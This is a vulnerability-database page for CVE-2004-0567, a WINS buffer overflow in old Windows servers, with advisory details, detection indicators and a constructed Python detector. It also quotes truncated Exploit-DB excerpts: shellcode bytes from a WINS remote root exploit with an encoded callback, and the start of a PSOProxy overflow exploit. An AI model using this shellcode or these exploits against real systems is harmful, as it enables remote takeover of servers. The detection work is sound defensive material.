CVE-2004-0567
published 2004-12-31
Priority: P3 · 55 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 72.29% (99.4th percentile)
The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability."
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_nt | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04
- bytes: \xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c
- Monitor for anomalous inbound TCP connections to the WINS service (port 42) containing the malformed packet header bytes 00 03 0d 4c 77 77 FF 77 05 4e 00 3c, which is the exploit trigger packet for CVE-2004-0567.
- The exploit shellcode uses XOR obfuscation with key 0x93939393 for the callback IP and 0x9393 for the callback port embedded in the payload; scan WINS traffic for payloads containing the repeating byte pattern 93 93 93 93.
- The exploit sends a large (~200 KB) repeated-pattern buffer to the WINS service; alert on unusually large TCP payloads destined for port 42 (WINS).
- The vulnerability is an unchecked buffer in WINS computer name validation; the WINS service (wins.exe) crashing or restarting unexpectedly on Windows 2000 SP3/SP4 or Windows Server 2003 may indicate exploitation attempts.
- The exploit targets Windows 2000 SP3/SP4 specifically; the author notes it 'probably' works across all language versions, but the hardcoded offsets and shellcode may not be reliable across all patch levels of NT4 SP6a, NT Terminal Server 4.0 SP6, or Windows Server 2003, which are also listed as vulnerable.
- The callback IP and port in the shellcode are XOR-encoded at runtime; static byte-pattern signatures for the shellcode must account for the variable encoded bytes at offsets 2–5 (port) and 4–7 (IP) within the shellcode buffer.
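The three network indicators above, applied together to reassembled inbound TCP streams, as an added detection example (not code from the page or from Exploit-DB). The `InboundStream` type, the 100 KB size threshold and the sample traffic are constructed for the example; the header bytes and the XOR-key run come from the notes above.

```python
from dataclasses import dataclass

WINS_PORT = 42
# First 12 bytes of the trigger packet quoted in the detection notes above
TRIGGER_HEADER = bytes.fromhex("00030d4c7777ff77054e003c")
# Repeating XOR-key bytes the notes say are embedded in the shellcode
XOR_KEY_RUN = bytes.fromhex("93939393")
# Assumed threshold: the notes describe a ~200 KB buffer, so anything over 100 KB is oversized
LARGE_PAYLOAD_BYTES = 100 * 1024

@dataclass
class InboundStream:  # constructed type: reassembled client->server bytes of one TCP connection
    src: str
    dst_port: int
    payload: bytes

def match_indicators(stream: InboundStream) -> list[str]:
    """Names of the CVE-2004-0567 indicators present in one inbound stream (empty if not WINS)."""
    if stream.dst_port != WINS_PORT:
        return []
    hits = []
    if stream.payload[:len(TRIGGER_HEADER)] == TRIGGER_HEADER:
        hits.append("wins_trigger_header")
    if XOR_KEY_RUN in stream.payload:
        hits.append("xor_key_93939393")
    if len(stream.payload) > LARGE_PAYLOAD_BYTES:
        hits.append("oversized_wins_payload")
    return hits

def severity(hits: list[str]) -> str:
    """The header is the exploit's own trigger (high alone); size or the XOR run can be noise."""
    if "wins_trigger_header" in hits:
        return "high"
    return {0: "none", 1: "low"}.get(len(hits), "medium")

def scan(streams: list[InboundStream]) -> list[tuple[str, str, list[str]]]:
    """(src, severity, hits) for every stream that matched at least one indicator."""
    out = []
    for s in streams:
        hits = match_indicators(s)
        if hits:
            out.append((s.src, severity(hits), hits))
    return out

# Constructed samples: a short benign-looking WINS message, a stream with the trigger header,
# a ~200 KB filler and the XOR-key run, and the same header bytes on a non-WINS port.
SAMPLES = [
    InboundStream("10.0.0.5", 42, b"\x00\x00\x00\x2a" + b"\x00" * 40),
    InboundStream("198.51.100.7", 42, TRIGGER_HEADER + b"\x01\x02\x03\x04" + b"\x90" * (200 * 1024) + XOR_KEY_RUN),
    InboundStream("10.0.0.9", 445, TRIGGER_HEADER + b"A" * 10),
]
```

Only the second sample is reported, at high severity; the same bytes on port 445 are ignored because the indicators are scoped to WINS traffic.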
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000 - WINS Remote Code Execution (exploitdb · 2004-12-31 · CVE-2004-0567)
```c
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by: zuc */
/* works on Windows 2000 SP3/SP4 probably every language */
/*************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\
```
Exploit-DB
PSOProxy 0.91 - Remote Buffer Overflow (1) (exploitdb · 2004-02-20 · CVE-2004-0313)
```c
// source: https://www.securityfocus.com/bid/9706/info
It has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to insufficient boundary checking.
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server.
/*
** Here is my first exploit; it deals with a flaw in the PSOProxy v0.91 program.
** It is a textbook buffer overflow and easy to do (that's why I managed it ^^)
**
** For technical info go here: http://seclists.org/lists/bugtraq/2004/Feb/0567.html
**
** Otherwise the exploit consists of: 1. connect to the remote PC
** 2. on envoit le co
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/13466
- http://securitytracker.com/id?1012517
- http://www.ciac.org/ciac/bulletins/p-054.shtml
- http://www.kb.cert.org/vuls/id/378160
- http://www.osvdb.org/12370
- http://www.securityfocus.com/bid/11922
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-045
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18259